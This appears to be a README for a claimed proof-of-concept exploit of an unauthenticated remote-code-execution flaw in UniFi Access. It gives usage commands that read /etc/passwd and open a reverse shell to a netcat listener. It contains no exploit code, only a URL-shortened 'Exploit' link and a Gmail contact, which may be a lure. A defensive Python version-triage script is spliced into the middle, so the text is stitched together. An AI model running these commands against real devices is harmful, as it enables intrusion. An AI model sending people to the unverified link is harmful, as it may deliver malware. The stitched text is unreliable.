Introduction
# CVE-2025-52665
This repository contains a **proof-of-concept exploit** for **CVE-2025-52665**, an **unauthenticated API access vulnerability** in **Ubiquiti UniFi Access Application versions 3.3.22 to 3.4.31**.
The exploit leverages a **misconfiguration in the management API** that exposes critical endpoints **without authentication**, allowing **remote code execution (RCE)** on affected devices. The flaw was introduced in version 3.3.22 and remains present through 3.4.31.
---
### Usage Warning
> **This tool is for authorized penetration testing only.**
> Verify legal compliance before use.
> **Ubiquiti has patched this in 4.0.21+** — update immediately if vulnerable.
---
### Exploit Details
The vulnerability exists in the **management API**, which incorrectly trusts **all requests originating from the local management network** (`192.168.0.0/16`, `10.0.0.0/8`, etc.) without validating session tokens or applying source IP restrictions.
A malicious actor with **access to the management VLAN** can send crafted JSON payloads to trigger system-level commands via the **diagnostic and update subsystems**.
---
### Installation
```
pip install -r requirements.txt
```
---
### Usage Examples
#### 1. Execute a single command
```
python unifi-rce.py --target http://192.168.1.100:8080 --cmd "cat /etc/passwd"
```
#### 2. Get a reverse shell
```
# Start listener
nc -lvnp 4444
# Trigger exploit
python unifi-rce.py --target http://192.168.1.100:8080 --reverse 192.168.1.200 4444
```
---
### Mitigation
- **Update to UniFi Access Application 4.0.21 or later**
- Restrict the management interface to trusted IPs only
- Disable API access from untrusted networks
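
To act on the first mitigation item across a fleet, the following added example (not part of this repository) triages an inventory against the version boundaries stated in this README. Host names, version strings and status labels are constructed for the example; versions above 3.4.31 but below 4.0.21 are not covered by the README, so they are reported separately instead of being assumed safe.

```python
import re
from collections import defaultdict

# Boundaries exactly as stated in this README.
AFFECTED_MIN, AFFECTED_MAX = (3, 3, 22), (3, 4, 31)
FIXED_MIN = (4, 0, 21)

# Accepts "3.4.31", "v3.4.31", "3.4.31-beta.2", "3.4.31.1207" (suffix ignored).
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)(?:[-+.]\S*)?\s*$")


def parse_version(text):
    """Return (major, minor, patch) as ints, or None if text is not a version."""
    m = _VERSION_RE.match(text or "")
    return tuple(int(part) for part in m.groups()) if m else None


def classify(text):
    """Map a reported version string to a status label (labels are this example's)."""
    v = parse_version(text)
    if v is None:
        return "unparseable"       # verify by hand; do not assume safe
    if AFFECTED_MIN <= v <= AFFECTED_MAX:
        return "affected"
    if v >= FIXED_MIN:
        return "fixed"
    if v < AFFECTED_MIN:
        return "before-3.3.22"     # README says the flaw was introduced in 3.3.22
    return "unlisted-upgrade"      # between 3.4.31 and 4.0.21: not covered by the README


def triage(inventory):
    """Group (host, version) pairs by status."""
    groups = defaultdict(list)
    for host, version in inventory:
        groups[classify(version)].append(host)
    return dict(groups)


# Constructed sample inventory (hypothetical host names).
SAMPLE = [
    ("access-hub-01", "3.3.22"), ("access-hub-02", "v3.4.31-rc1"),
    ("access-hub-03", "3.10.2"),   # numeric compare: 3.10 > 3.4, a string compare gets this wrong
    ("access-hub-04", "4.0.21"), ("access-hub-05", "3.2.9"),
    ("access-hub-06", "unknown"),
]

if __name__ == "__main__":
    for status, hosts in sorted(triage(SAMPLE).items()):
        print(f"{status:18} {', '.join(hosts)}")
```
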
---
### Exploit - [href](https://tinyurl.com/4e4wdaxt)
For any inquiries, please email me at: eviedejesu803@gmail.com
File snapshot
[4.0K] /data/pocs/ccad704d911ce20ccb7594d326beafc22141f27a
└── [1.8K] README.md
0 directories, 1 file